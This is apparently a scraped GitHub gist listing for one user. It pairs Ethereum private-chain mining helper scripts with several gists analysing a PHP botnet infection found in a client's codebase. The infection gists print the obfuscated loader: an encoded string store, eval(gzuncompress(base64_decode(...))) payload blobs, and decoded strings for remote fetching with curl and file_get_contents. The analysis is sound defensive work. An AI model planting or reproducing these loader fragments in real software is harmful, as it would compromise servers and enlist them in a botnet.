Skip to content

Instantly share code, notes, and snippets.

Avatar

Ryan ryepdx

View GitHub Profile
@ryepdx
ryepdx / mine.js
Last active Feb 10, 2018
Turn the Ethereum miner on and off intelligently to save your CPU when mining on a private chain.
View mine.js
// Adapted from Iuri Matias' Embark framework
// https://github.com/iurimatias/embark-framework
// Modified by ryepdx to mine at regular intervals.
(function() {
var main = function () {
if (!loadScript("config.js")) {
console.log("== config.js not found");
}
if (typeof(config) === "undefined") {
View cryptofresh_scraper.js
'use strict'
var scrap = require('scrap')
scrap('http://cryptofresh.com/u/maker-fund', function (err, $) {
if (err) {
console.error(err)
return
}
$('#body div.col-sm-8 span.action').each(function (i, row) {
@ryepdx
ryepdx / config.js
Created Feb 28, 2016
An optional configuration file to go with mine.js
View config.js
config = {
interval_ms: 15000,
mine_pending_txns: true,
mine_periodically: true,
mine_normally: false
};
@ryepdx
ryepdx / mine.js
Created Feb 28, 2016
A script to make geth mine at a slower rate. Useful for development on private chains.
View mine.js
// Adapted from Iuri Matias' Embark framework
// https://github.com/iurimatias/embark-framework
// Modified by ryepdx to mine at regular intervals.
(function() {
var main = function () {
if (!loadScript("config.js")) {
console.log("== config.js not found");
}
if (typeof(config) === "undefined") {
@ryepdx
ryepdx / infection_exposed_and_explained.php
Last active Feb 21, 2016
After de-obfuscating and commenting the botnet slave code I found in a client's codebase, this is what I ended up with. http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
View infection_exposed_and_explained.php
<?php
// "!defined('determinator') == "include_once" for sneaky people.
if (!defined("determinator")){
function determinator_feof($file_pointer, &$now = NULL) {
// Assigning a value to $now in this function changes
// the value of whatever variable the calling function
// passed in. Functions with side effects... huzzah!
$now = microtime(true);
// Have we reached the end of the file?
@ryepdx
ryepdx / infection_one_layer_down.php
Created Feb 22, 2013
Found this botnet code in a client's codebase. This is the code the first obfuscated layer was executing. (Whitespace added for your convenience.) http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
View infection_one_layer_down.php
<?php
/*versio:2.18*/
$III1=0;
if (!function_exists('IlI11lll')){
$GLOBALS['III1'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZ
@ryepdx
ryepdx / infection_raw.php
Created Feb 22, 2013
Found this botnet code in a client's codebase. Cleaned it up, then went about de-obfuscating it to figure out what it was doing. http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
View infection_raw.php
<?php
/*versio:2.18*/$QQOO=0;if (!function_exists('Q0QQOOQO')){$GLOBALS['QQOO'] = 'hY3VybAX2luaXQ)W*YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLw TJndheT1maWxlX2dldF9jb250ZW50cw{aX3NldG9wdAHX2V4ZWMSaC~ujJndheT1jdXJsikSMnDCLwfpb3Nvbi5pbglYS1pbi1hLWNpcmNsZS5jb20.rYcGhwYWlkZS5jb20!dwJWV8DES~&OgGY{ZGlzcGxheV9lcnJvcnM*ZGV0ZXJtaW5hdG9yZnRwMTM.Mi4xOA~NUVFRT1EwT1EwT09RT1FPYmFzZTY0X2RlY29kZQRGYmFzZTY0X2VuY29kZQuSFRUUF9IT1NUdW5pb24XOO@b!c2VsZWN0MmUkVRVUVTVF9VUkkduVU0NSSVBUX05BTUUELQUVVFUllfU1RSSU5HPwq&dL3RtcC8uZm9udC11bml4kuzVE1QI VEVNUAVE1QRElSfCHC)dG1wd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQqdXBsb2FkX3RtcF9kaXIBXL3RtcAR@ LgJdmVyc2lvOLQnyLXBocAzPrjyLSFRUUF9FWEVDUEhQVvYb3V0kMUb2s=yLSFRUUF9VU0VSX0FHRU5UiqLAHRZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgIk$L3BnLnBocD91PQJms9JnQ9cGhwJnA9JnY9EZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlY0MXZvbGdRLzFkZVRkTkE0bklnNHNmMXVHaTY5a3JTazJwMWswM1hFRmVmTFZrRUEzamRwdkYvdjVsNUQzaFcycjJyVGNRMzgrWjdmak9FRzZhZHJma21qUGxhYTZ4NXp0TnRHQy96SkczbytpdmI3T05WSGlZeFV5bkJoaWNiN2R5eklpdnl
View replace_get_string.py
replace_dict = {
'get_string(2, 6)': 'curl',
'get_string(9, 7)': '_init',
'get_string(17, 20)': 'allow_url_fopen',
'get_string(17, 20)': 'allow_url_fopen',
'get_string(37, 2)': '1',
'get_string(39, 10)': 'http://',
'get_string(51, 30)': '&way=file_get_contents',
'get_string(82, 10)': '_setopt',
'get_string(95, 7)': '_exec',
View TELLMESTRINGS.php
<?php
if (!function_exists('get_string')){
$GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZEVsVVFibW0rMDB5
@ryepdx
ryepdx / gist:5015935
Created Feb 22, 2013
The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit.
View gist:5015935
<?php
if (!function_exists('get_string')){
$GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZEVsVVFibW0rMDB5
You can’t perform that action at this time.